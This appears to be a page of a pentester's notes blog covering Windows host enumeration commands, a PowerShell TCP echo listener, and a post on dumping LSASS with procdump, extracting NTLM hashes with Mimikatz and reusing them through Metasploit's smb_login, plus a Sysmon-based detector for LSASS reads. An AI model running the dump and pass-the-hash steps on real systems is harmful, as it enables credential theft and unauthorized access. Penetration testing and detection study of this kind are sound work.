>wmic logicaldisk get caption, description, providername
Caption Description ProviderName
C: Local Fixed Disk
X: Network Connection \\server\user\XXX
Y: Network Connection \\server\public
Friday, October 18, 2019
Print all environment variables with "set"
>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
Patches Installed wmic qfe
>wmic qfe
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Windows Systeminfo
>systeminfo | findstr /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
Tuesday, October 15, 2019
PowerShell listening on a port
# Simple TCP echo listener: accepts one client on 0.0.0.0:1080, prints what it receives and sends it back.
$socket = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, 1080)
if ($socket -eq $null) {
    exit 1
}
$socket.Start()
$client = $socket.AcceptTcpClient()
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] 2048
try
{
    do
    {
        $read = $null
        # Keep reading while the client has data queued, or until the first read completes.
        while ($stream.DataAvailable -or $read -eq $null) {
            $read = $stream.Read($buffer, 0, 2048)
            if ($read -gt 0) {
                # Decode only the bytes actually read; the rest of the buffer is stale or zero.
                $data = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read).TrimEnd()
                [Array]::Clear($buffer, 0, $buffer.Length)
                if ($data -ne $null -and $data.Length -gt 0) {
                    Write-Output ("RECEIVED : [{0}]" -f $data)
                    $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                    # Write exactly as many bytes as were encoded.
                    $stream.Write($sendBack, 0, $sendBack.Length)
                    Write-Output ("SENT BACK: [{0}]" -f $data)
                }
            }
        }
    } while ($read -gt 0)   # a read of 0 bytes means the client closed the connection
}
finally
{
    # Release resources in reverse order of acquisition.
    if ($stream) { $stream.Dispose() }
    if ($client) { $client.Close() }
    $socket.Stop()
}
Wednesday, October 2, 2019
Lsass Dump Mimikatz Pass the Hash Basics
procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
good blog
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
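A defender-side check to pair with the LSASS dump step above, as an added example that is not from this blog: it parses constructed Sysmon Event ID 10 (ProcessAccess) records and flags any process that was granted PROCESS_VM_READ on lsass.exe, the minimum right needed to read its memory. The pipe-separated "Key: value" line layout, sample paths and timestamps are assumptions made up for the example.

```python
"""Flag LSASS memory-read access in Sysmon Event ID 10 (ProcessAccess) records."""
import re

# Access-mask bits from the Windows process security model.
PROCESS_VM_READ = 0x0010        # required to read another process's memory
PROCESS_ALL_ACCESS = 0x1FFFFF   # full access; used in the constructed sample below

# Constructed sample events (not real telemetry), one event per line.
SAMPLE_EVENTS = """\
UtcTime: 2019-10-02 14:01:07.123|SourceImage: C:\\Tools\\procdump.exe|TargetImage: C:\\Windows\\system32\\lsass.exe|GrantedAccess: 0x1FFFFF
UtcTime: 2019-10-02 14:03:44.987|SourceImage: C:\\Windows\\system32\\svchost.exe|TargetImage: C:\\Windows\\system32\\lsass.exe|GrantedAccess: 0x1000
UtcTime: 2019-10-02 14:05:10.555|SourceImage: C:\\Users\\XXXX\\mimikatz.exe|TargetImage: C:\\Windows\\system32\\lsass.exe|GrantedAccess: 0x1010
UtcTime: 2019-10-02 14:06:00.000|SourceImage: C:\\Tools\\procdump.exe|TargetImage: C:\\Windows\\system32\\notepad.exe|GrantedAccess: 0x1FFFFF
"""

FIELD_RE = re.compile(r"(\w+): ([^|]*)")


def parse_event(line):
    """Turn one 'Key: value|Key: value' line into a dict."""
    return dict(FIELD_RE.findall(line))


def is_lsass_read(event):
    """True when the target is lsass.exe and the granted mask includes PROCESS_VM_READ."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    mask = int(event.get("GrantedAccess", "0"), 16)
    return bool(mask & PROCESS_VM_READ)


def find_lsass_reads(text):
    """Return (UtcTime, SourceImage, GrantedAccess) for every event that reads LSASS memory."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if is_lsass_read(event):
            hits.append((event["UtcTime"], event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for when, source, mask in find_lsass_reads(SAMPLE_EVENTS):
        print(f"{when}  {source}  GrantedAccess={mask}")
```

The svchost.exe line is not flagged because 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) carries no read right, and the notepad.exe line is not flagged because the target is not LSASS.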
Labels: lsass, Mimikatz, Pass the hash, Pass-the-hash, procdump, PTH, SMB_login
When you can & cannot Pass the Hash
great blog
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
From a pentesting perspective:
- You CAN perform Pass-The-Hash attacks with NTLM hashes.
- You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
Labels: Mimikatz, Pass the hash, Pass-the-hash, psexec, PTH, Responder, SMB_login